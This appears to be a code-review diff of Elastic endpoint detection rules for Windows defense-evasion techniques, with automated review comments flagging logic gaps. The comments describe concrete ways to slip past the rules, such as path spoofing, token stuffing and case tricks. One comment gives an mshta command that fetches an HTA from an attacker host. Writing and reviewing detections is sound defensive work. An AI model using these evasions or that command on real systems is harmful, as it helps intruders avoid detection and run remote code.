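Review bot: The exclusion `not process.executable : ("C:\\Program Files\\*.exe", "C:\\Program Files (x86)\\*.exe", "C:\\Users\\*.exe", "C:\\ProgramData\\*.exe")` in the trusted-directory hunk whitelists every path under `C:\Users` and `C:\ProgramData`, so a binary at `C:\Users\Public\Program Files\svchost.exe` — exactly the look-alike location this rule is meant to catch — is excluded; the last two entries should be narrowed to the specific per-user install roots that produced false positives, or removed. The rule also hard-codes the `C:` drive in both the match and the exclusion while the other rules in this change use `?:`, so a Windows install on another drive letter, or a copy on a secondary volume, is never evaluated; `process.executable : "?:\\*Program*Files*\\*.exe" and` with the exclusion list switched to `?:` would be consistent with the siblings.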
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
[rule]
author = ["Elastic"]
@@ -82,8 +82,8 @@ type = "eql"
query = '''
sequence by host.id, process.entity_id with maxspan = 5s
- [process where event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1]
- [network where process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and
+ [process where host.os.type == "windows" and event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1]
+ [network where host.os.type == "windows" and process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and
network.direction : ("outgoing", "egress") and destination.ip !="::1" and destination.ip !="127.0.0.1" ]
'''
diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml
index 60ecb3d15..426103e78 100644
--- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml
+++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Austin Songer"]
@@ -77,7 +77,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-registry where event.type in ("creation", "change") and
+registry where host.os.type == "windows" and event.type in ("creation", "change") and
(registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\PUAProtection" and
registry.data.strings : ("0", "0x00000000")) or
(registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" and
diff --git a/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml b/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
index 951d0f3ba..87136d98a 100644
--- a/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
+++ b/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -27,10 +27,10 @@ type = "eql"
query = '''
sequence by process.entity_id
- [process where (process.name : "expand.exe" or process.name : "extrac32.exe" or
+ [process where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or
process.name : "ieexec.exe" or process.name : "makecab.exe") and event.type == "start"]
- [network where (process.name : "expand.exe" or process.name : "extrac32.exe" or
+ [network where host.os.type == "windows" and (process.name : "expand.exe" or process.name : "extrac32.exe" or
process.name : "ieexec.exe" or process.name : "makecab.exe") and
not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32",
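Review bot: In the Defender-tampering hunk the new predicate chain `registry where host.os.type == "windows" and event.type in ("creation", "change") and (registry.path : "...PUAProtection" and registry.data.strings : ("0", "0x00000000")) or (registry.path : "...DisallowExploitProtectionOverride" and ...` has `and` binding tighter than `or`, so the `host.os.type` and `event.type` guards apply only to the first `(registry.path ... PUAProtection ...)` branch; every alternative after the first `or` is evaluated for any registry event on any OS, which defeats the purpose of this change and costs needless evaluations. Wrap the whole disjunction: keep `registry where host.os.type == "windows" and event.type in ("creation", "change") and (` as the opening line, indent the existing branches under it, and add a matching `)` after the last branch, which lies outside this hunk. The remaining `or` branches of the query are not visible here, so the closing parenthesis placement needs checking against the full file.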
diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml
index b6a7a7bdf..35eb55fd5 100644
--- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml
+++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -86,7 +86,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-registry where event.type == "change" and
+registry where host.os.type == "windows" and event.type == "change" and
registry.path : (
"HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\AccessVBOM",
"HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\VbaWarnings",
diff --git a/rules/windows/defense_evasion_msbuild_beacon_sequence.toml b/rules/windows/defense_evasion_msbuild_beacon_sequence.toml
index 831f62ad4..85f138312 100644
--- a/rules/windows/defense_evasion_msbuild_beacon_sequence.toml
+++ b/rules/windows/defense_evasion_msbuild_beacon_sequence.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/02"
integration = ["endpoint", "windows"]
maturity = "development"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,8 +25,8 @@ query = '''
/* duplicate of MsBuild Making Network Connections - 0e79980b-4250-4a50-a509-69294c14e84b */
sequence by process.entity_id
- [process where event.type == "start" and process.name : "MSBuild.exe"]
- [network where process.name : "MSBuild.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "MSBuild.exe"]
+ [network where host.os.type == "windows" and process.name : "MSBuild.exe" and
not (destination.ip == "127.0.0.1" and source.ip == "127.0.0.1")]
'''
diff --git a/rules/windows/defense_evasion_msbuild_making_network_connections.toml b/rules/windows/defense_evasion_msbuild_making_network_connections.toml
index 40af128bc..da870699d 100644
--- a/rules/windows/defense_evasion_msbuild_making_network_connections.toml
+++ b/rules/windows/defense_evasion_msbuild_making_network_connections.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,8 +25,8 @@ type = "eql"
query = '''
sequence by process.entity_id
- [process where process.name : "MSBuild.exe" and event.type == "start"]
- [network where process.name : "MSBuild.exe" and
+ [process where host.os.type == "windows" and process.name : "MSBuild.exe" and event.type == "start"]
+ [network where host.os.type == "windows" and process.name : "MSBuild.exe" and
not cidrmatch(destination.ip, "127.0.0.1", "::1")]
'''
diff --git a/rules/windows/defense_evasion_mshta_beacon.toml b/rules/windows/defense_evasion_mshta_beacon.toml
index 88db5270b..2993d680e 100644
--- a/rules/windows/defense_evasion_mshta_beacon.toml
+++ b/rules/windows/defense_evasion_mshta_beacon.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,12 +25,12 @@ type = "eql"
query = '''
sequence by process.entity_id with maxspan=10m
- [process where event.type == "start" and process.name : "mshta.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and
not process.parent.name : "Microsoft.ConfigurationManagement.exe" and
not (process.parent.executable : "C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe" or process.parent.executable : "C:\\TeamViewer\\TeamViewer.exe") and
not process.args : "ADSelfService_Enroll.hta"]
- [network where process.name : "mshta.exe"]
+ [network where host.os.type == "windows" and process.name : "mshta.exe"]
'''
diff --git a/rules/windows/defense_evasion_msxsl_beacon.toml b/rules/windows/defense_evasion_msxsl_beacon.toml
index 6ce88eb49..4360cfdc1 100644
--- a/rules/windows/defense_evasion_msxsl_beacon.toml
+++ b/rules/windows/defense_evasion_msxsl_beacon.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/02"
integration = ["endpoint", "windows"]
maturity = "development"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -25,8 +25,8 @@ query = '''
/* duplicate of Network Connection via MsXsl - b86afe07-0d98-4738-b15d-8d7465f95ff5 */
sequence by process.entity_id
- [process where event.type == "start" and process.name : "msxsl.exe"]
- [network where process.name : "msxsl.exe" and network.direction : ("outgoing", "egress")]
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "msxsl.exe"]
+ [network where host.os.type == "windows" and process.name : "msxsl.exe" and network.direction : ("outgoing", "egress")]
'''
diff --git a/rules/windows/defense_evasion_msxsl_network.toml b/rules/windows/defense_evasion_msxsl_network.toml
index 4b372cac5..0cdbcee14 100644
--- a/rules/windows/defense_evasion_msxsl_network.toml
+++ b/rules/windows/defense_evasion_msxsl_network.toml
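Review bot: Two of the false-positive exclusions in the mshta hunk are attacker-controllable: `process.parent.executable : "C:\\TeamViewer\\TeamViewer.exe"` names a directory at the drive root that does not appear to be the product's default install location, and on default Windows ACLs a standard user can create a top-level folder on the system drive and place a binary called TeamViewer.exe there; and `not process.args : "ADSelfService_Enroll.hta"` suppresses any mshta command line that carries that token anywhere, e.g. `mshta.exe https://attacker/x.hta ADSelfService_Enroll.hta`. Consider constraining the parent by a signer field such as `process.parent.code_signature.subject_name` if the data source populates it, rather than by a user-creatable path, and pinning the HTA exclusion to the full expected path of the enrolment file. The `maxspan=10m` bound and the `host.os.type` predicates added here are fine.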
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -26,8 +26,8 @@ type = "eql"
query = '''
sequence by process.entity_id
- [process where process.name : "msxsl.exe" and event.type == "start"]
- [network where process.name : "msxsl.exe" and
+ [process where host.os.type == "windows" and process.name : "msxsl.exe" and event.type == "start"]
+ [network where host.os.type == "windows" and process.name : "msxsl.exe" and
not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4",
diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
index 70012806a..c6ef8d38f 100644
--- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -79,7 +79,7 @@ type = "eql"
query = '''
sequence by process.entity_id with maxspan=5m
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
/* known applocker bypasses */
(process.name : "bginfo.exe" or
diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml
index 69f9d5a13..bd06daf99 100644
--- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml
+++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/15"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -29,7 +29,7 @@ query = '''
sequence by host.id, user.id with maxspan=3m
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
process.Ext.token.integrity_level_name != "system" and
(
process.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe",
@@ -52,7 +52,7 @@ sequence by host.id, user.id with maxspan=3m
"?:\\Windows\\System32\\WerFault.exe", "?:\\Windows\\SysWOW64\\WerFault.exe")
] by process.pid
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
process.parent.Ext.real.pid > 0 and
/* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */
diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
index 5fbd0e58d..8e012822c 100644
--- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
+++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -39,7 +39,7 @@ timestamp_override = "event.ingested"
type = "eql"
query = '''
-registry where registry.path : (
+registry where host.os.type == "windows" and registry.path : (
"HKLM\\*\\LocalAccountTokenFilterPolicy",
"\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy") and
registry.data.strings : ("1", "0x00000001")
diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml
index ae2c33478..dc37bd7ad 100644
--- a/rules/windows/defense_evasion_posh_assembly_load.toml
+++ b/rules/windows/defense_evasion_posh_assembly_load.toml
@@ -2,7 +2,7 @@ creation_date = "2021/10/15"
integration = ["windows"]
maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
@@ -103,7 +103,7 @@ timestamp_override = "event.ingested"
type = "query"
query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
powershell.file.script_block_text : (
"[System.Reflection.Assembly]::Load" or
"[Reflection.Assembly]::Load"
diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml
index e51cb68de..d0b96d343 100644
--- a/rules/windows/defense_evasion_posh_compressed.toml
+++ b/rules/windows/defense_evasion_posh_compressed.toml
@@ -2,7 +2,7 @@ creation_date = "2021/10/19"
integration = ["windows"]
maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
@@ -103,7 +103,7 @@ timestamp_override = "event.ingested"
type = "query"
query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
powershell.file.script_block_text : (
(
"System.IO.Compression.DeflateStream" or
diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml
index 1a99259a1..28fe9b635 100644
--- a/rules/windows/defense_evasion_posh_encryption.toml
+++ b/rules/windows/defense_evasion_posh_encryption.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/01/23"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
type = "query"
query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
powershell.file.script_block_text : (
(
"Cryptography.AESManaged" or
diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml
index 8526c8295..4ee9b0824 100644
--- a/rules/windows/defense_evasion_posh_process_injection.toml
+++ b/rules/windows/defense_evasion_posh_process_injection.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -88,7 +88,7 @@ timestamp_override = "event.ingested"
type = "query"
query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
powershell.file.script_block_text : (
(VirtualAlloc or VirtualAllocEx or VirtualProt­ect or LdrLoadDll or LoadLibrary or LoadLibraryA or LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and
diff --git a/rules/windows/defense_evasion_potential_processherpaderping.toml b/rules/windows/defense_evasion_potential_processherpaderping.toml
index 838d40c00..981b3d7e7 100644
--- a/rules/windows/defense_evasion_potential_processherpaderping.toml
+++ b/rules/windows/defense_evasion_potential_processherpaderping.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Elastic"]
@@ -26,14 +26,14 @@ type = "eql"
query = '''
sequence with maxspan=5s
- [process where event.type == "start" and not process.parent.executable :
+ [process where host.os.type == "windows" and event.type == "start" and not process.parent.executable :
(
"?:\\Windows\\SoftwareDistribution\\*.exe",
"?:\\Program Files\\Elastic\\Agent\\data\\*.exe",
"?:\\Program Files (x86)\\Trend Micro\\*.exe"
)
] by host.id, process.executable, process.parent.entity_id
- [file where event.type == "change" and event.action == "overwrite" and file.extension == "exe"] by host.id, file.path, process.entity_id
+ [file where host.os.type == "windows" and event.type == "change" and event.action == "overwrite" and file.extension == "exe"] by host.id, file.path, process.entity_id
'''
diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml
index 28157aaad..c42aacd21 100644
--- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml
+++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
maturity = "production"
min_stack_comments = "New fields added: required_fields, related_integrations, setup"
min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
[rule]
author = ["Austin Songer"]
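Review bot: `file.extension == "exe"` in the herpaderping file stage is a case-sensitive comparison, unlike the `file.extension : "exe"` and `file.extension : ("exe", "scr", "com")` used by the multiple-extension and process-deletion rules in this same change, so an overwrite of `payload.EXE` (which Windows executes just the same) is not matched; use `file.extension : "exe"` to align with the siblings. The parent exclusion `"?:\\Program Files\\Elastic\\Agent\\data\\*.exe"` suppresses every child of the Agent's data tree, which is a broad carve-out for a component that typically runs as SYSTEM, though the path is at least admin-writable only. The new `host.os.type` predicates on both stages are consistent with the rest of the change.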
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.action == "start" and +process where host.os.type == "windows" and event.action == "start" and (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and process.args : "*Set-NetFirewallProfile*" and (process.args : "*-Enabled*" and process.args : "*False*") and diff --git a/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml b/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml index d6a61782e..75d883b17 100644 --- a/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml +++ b/rules/windows/defense_evasion_process_termination_followed_by_deletion.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type == "end" and + [process where host.os.type == "windows" and event.type == "end" and process.code_signature.trusted != true and not process.executable : ("C:\\Windows\\SoftwareDistribution\\*.exe", "C:\\Windows\\WinSxS\\*.exe") ] by process.executable - [file where event.type == "deletion" and file.extension : ("exe", "scr", "com") and + [file where host.os.type == "windows" and event.type == "deletion" and file.extension : ("exe", "scr", "com") and not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe", diff --git a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml index d12069582..ce1fda7f5 100644 --- a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml 
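Review bot: The process filter keys on `event.action == "start"` while every other process rule in this diff keys on `event.type == "start"`; the rule declares both the `endpoint` and `windows` integrations, and on Sysmon-sourced data `event.action` is a descriptive string rather than `start`, so the `windows` integration path is likely never matched. Change the first line to `process where host.os.type == "windows" and event.type == "start" and`. Separately, `process.args : "*-Enabled*"` and `process.args : "*False*"` are tested independently, so `Set-NetFirewallProfile -Enabled True -LogBlocked False` also satisfies both; matching the pair adjacently in `process.command_line` would be tighter. The query continues past the end of the hunk.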
+++ b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.pe.original_file_name == "msdt.exe" or process.name : "msdt.exe") and ( process.args : ("IT_RebrowseForFile=*", "ms-msdt:/id", "ms-msdt:-id", "*FromBase64*") or diff --git a/rules/windows/defense_evasion_rundll32_no_arguments.toml b/rules/windows/defense_evasion_rundll32_no_arguments.toml index 576455d00..48876f060 100644 --- a/rules/windows/defense_evasion_rundll32_no_arguments.toml +++ b/rules/windows/defense_evasion_rundll32_no_arguments.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,11 +26,11 @@ type = "eql" query = ''' sequence with maxspan=1h - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "rundll32.exe" or process.pe.original_file_name == "RUNDLL32.EXE") and process.args_count == 1 ] by process.entity_id - [process where event.type == "start" and process.parent.name : "rundll32.exe" + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "rundll32.exe" ] by process.parent.entity_id ''' 
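Review bot: The second leg's `process.parent.name : "rundll32.exe"` is redundant with the `by process.entity_id` / `by process.parent.entity_id` join and it silently drops the renamed-binary case the first leg deliberately covers with `process.pe.original_file_name == "RUNDLL32.EXE"`: a copy named `r.exe` passes leg one, but its child never satisfies leg two. Let the join carry the parentage and reduce leg two to `[process where host.os.type == "windows" and event.type == "start"] by process.parent.entity_id`. The hunk shows the whole query.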
diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index df0a92580..d95dc0290 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml +++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ( "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt" diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index 0a1daa948..c623a29fd 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "change" and file.name : "*AAA.AAA" +file where host.os.type == "windows" and event.type == "change" and file.name : "*AAA.AAA" ''' diff --git a/rules/windows/defense_evasion_sip_provider_mod.toml b/rules/windows/defense_evasion_sip_provider_mod.toml index c4250a05b..a8c6c9e94 100644 
--- a/rules/windows/defense_evasion_sip_provider_mod.toml +++ b/rules/windows/defense_evasion_sip_provider_mod.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type:"change" and +registry where host.os.type == "windows" and event.type:"change" and registry.path: ( "*\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllPutSignedDataMsg\\{*}\\Dll", "*\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllPutSignedDataMsg\\{*}\\Dll", diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 4324ae4e8..6bd9e0617 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ( +registry where host.os.type == "windows" and registry.path : ( "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\Start", "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\Start" ) and diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index 9e073f949..2f6d5d99c 100644 
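Review bot: `event.type:"change"` mixes the unspaced colon form into an EQL query where the other registry rules in this diff write `event.type == "change"`; it works because `:` is case-insensitive, but the inconsistency invites a future editor to "fix" it the wrong way. Normalise the line to `registry where host.os.type == "windows" and event.type == "change" and`. The `registry.path` list continues past the end of the hunk.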
--- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -38,7 +38,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "certutil.exe" or process.pe.original_file_name == "CertUtil.exe") and process.args : ("?decode", "?encode", "?urlcache", "?verifyctl", "?encodehex", "?decodehex", "?exportPFX") ''' diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index c354d2f65..0f2722933 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.executable : "C:\\*" and +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*" and (process.working_directory : "?:\\" and not process.working_directory: "C:\\") and process.parent.name : "explorer.exe" and process.name : ("rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "regsvr32.exe", 
